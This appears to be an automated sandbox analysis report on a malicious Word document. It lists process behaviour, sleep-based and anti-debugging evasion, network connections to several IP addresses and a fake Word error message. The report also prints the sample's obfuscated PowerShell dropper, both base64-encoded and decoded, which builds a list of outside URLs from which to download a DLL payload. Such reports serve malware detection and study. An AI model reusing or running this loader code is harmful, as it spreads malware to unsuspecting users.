Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2496 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000004.00000002.2090995690.0000000000344000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt, 6_2_100011C0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 6_2_1000C620
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 6_2_1000C620
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 6_2_1000C620
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_007CF811 mov eax, dword ptr fs:[00000030h] 6_2_007CF811
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0039F811 mov eax, dword ptr fs:[00000030h] 7_2_0039F811
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0027F811 mov eax, dword ptr fs:[00000030h] 8_2_0027F811
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0027F811 mov eax, dword ptr fs:[00000030h] 9_2_0027F811
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 6_2_10001B30
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_10007F07

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 157.245.123.197 144 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 90.160.138.175 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 74.222.117.42 80 Jump to behavior
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded sEt MKu ( [TYPe]("{0}{1}{2}{4}{3}" -F 'SYsT','eM.','io.DI','ORY','rECt') ); SeT-iTEM ('vaR'+'IabLE'+':mBu') ( [TYPe]("{6}{8}{0}{3}{4}{5}{2}{7}{1}" -f'SteM','Ger','Ma','.n','et.seRVIcepOi','nt','s','NA','Y')); $ErrorActionPreference = (('S'+'il')+('en'+'t')+'ly'+('Cont'+'i'+'nue'));$Cvmmq4o=$Q26L + [char](64) + $E16H;$J16J=('N'+('_0'+'P')); (DIr VariabLE:Mku ).VaLUe::"c`REAt`edI`REC`TORy"($HOME + (('{'+'0}Db_bh'+'30'+'{0}'+'Yf'+'5be5g{0}') -F [chAR]92));$C39Y=(('U6'+'8')+'S'); ( vARiaBLe ("m"+"bu") -VAlueoN )::"sEcuRITYproT`o`c`ol" = ('T'+('ls'+'12'));$F35I=('I'+('4'+'_B'));$Swrp6tc = (('A6'+'9')+'S');$X27H=('C3'+'3O');$Imd1yck=$HOME+((('UO'+'H'+'Db_')+'b'+('h3'+'0UO')+('HY'+'f')+('5be5'+'g'+'UOH'))."ReP`lACe"(('U'+'OH'),[StrInG][chAr]92))+$Swrp6tc+(('.'+'dl')+'l');$K47V=('R'+('4'+'9G'));$B9fhbyv=(']'+('a'+'nw[3s://adm'+'int'+'k.c'+'o'+'m/'+'w')+('p-adm'+'in/'+'L/')+'@'+(']a'+'n'+'w[3s')+':'+'/'+'/m'+('ike'+'ge')+('e'+'r'+'inck.')+('c'+'om')+('/c/'+'Y'+'Ys')+'a'+('/@]'+'anw'+'['+'3://free'+'lanc'+'e'+'rw')+('ebdesi'+'gnerh'+'yd')+('er'+'aba')+('d.'+'com/')+('cgi'+'-bin'+'/S')+('/'+'@'+']anw')+('[3'+'://'+'etdog.co'+'m'+'/w')+('p-'+'co')+'nt'+('e'+'nt')+('/n'+'u/@')+(']a'+'nw[3')+'s'+('://'+'www'+'.hintu'+'p.c')+('o'+'m.')+('b'+'r/')+'w'+('p'+'-co')+('n'+'ten')+('t'+'/dE/'+'@]a'+'nw[3://'+'www.')+'s'+('tm'+'arouns'+'.')+('ns'+'w')+('.'+'edu.au/p'+'a'+'y'+'pal/b8')+('G'+'/@]')+('a'+'nw[')+('3:'+'/')+('/'+'wm.mcdeve'+'lop.net'+'/'+'c'+'on'+'t'+'e')+('nt'+'/')+'6
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded sEt MKu ( [TYPe]("{0}{1}{2}{4}{3}" -F 'SYsT','eM.','io.DI','ORY','rECt') ); SeT-iTEM ('vaR'+'IabLE'+':mBu') ( [TYPe]("{6}{8}{0}{3}{4}{5}{2}{7}{1}" -f'SteM','Ger','Ma','.n','et.seRVIcepOi','nt','s','NA','Y')); $ErrorActionPreference = (('S'+'il')+('en'+'t')+'ly'+('Cont'+'i'+'nue'));$Cvmmq4o=$Q26L + [char](64) + $E16H;$J16J=('N'+('_0'+'P')); (DIr VariabLE:Mku ).VaLUe::"c`REAt`edI`REC`TORy"($HOME + (('{'+'0}Db_bh'+'30'+'{0}'+'Yf'+'5be5g{0}') -F [chAR]92));$C39Y=(('U6'+'8')+'S'); ( vARiaBLe ("m"+"bu") -VAlueoN )::"sEcuRITYproT`o`c`ol" = ('T'+('ls'+'12'));$F35I=('I'+('4'+'_B'));$Swrp6tc = (('A6'+'9')+'S');$X27H=('C3'+'3O');$Imd1yck=$HOME+((('UO'+'H'+'Db_')+'b'+('h3'+'0UO')+('HY'+'f')+('5be5'+'g'+'UOH'))."ReP`lACe"(('U'+'OH'),[StrInG][chAr]92))+$Swrp6tc+(('.'+'dl')+'l');$K47V=('R'+('4'+'9G'));$B9fhbyv=(']'+('a'+'nw[3s://adm'+'int'+'k.c'+'o'+'m/'+'w')+('p-adm'+'in/'+'L/')+'@'+(']a'+'n'+'w[3s')+':'+'/'+'/m'+('ike'+'ge')+('e'+'r'+'inck.')+('c'+'om')+('/c/'+'Y'+'Ys')+'a'+('/@]'+'anw'+'['+'3://free'+'lanc'+'e'+'rw')+('ebdesi'+'gnerh'+'yd')+('er'+'aba')+('d.'+'com/')+('cgi'+'-bin'+'/S')+('/'+'@'+']anw')+('[3'+'://'+'etdog.co'+'m'+'/w')+('p-'+'co')+'nt'+('e'+'nt')+('/n'+'u/@')+(']a'+'nw[3')+'s'+('://'+'www'+'.hintu'+'p.c')+('o'+'m.')+('b'+'r/')+'w'+('p'+'-co')+('n'+'ten')+('t'+'/dE/'+'@]a'+'nw[3://'+'www.')+'s'+('tm'+'arouns'+'.')+('ns'+'w')+('.'+'edu.au/p'+'a'+'y'+'pal/b8')+('G'+'/@]')+('a'+'nw[')+('3:'+'/')+('/'+'wm.mcdeve'+'lop.net'+'/'+'c'+'on'+'t'+'e')+('nt'+'/')+'6 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcA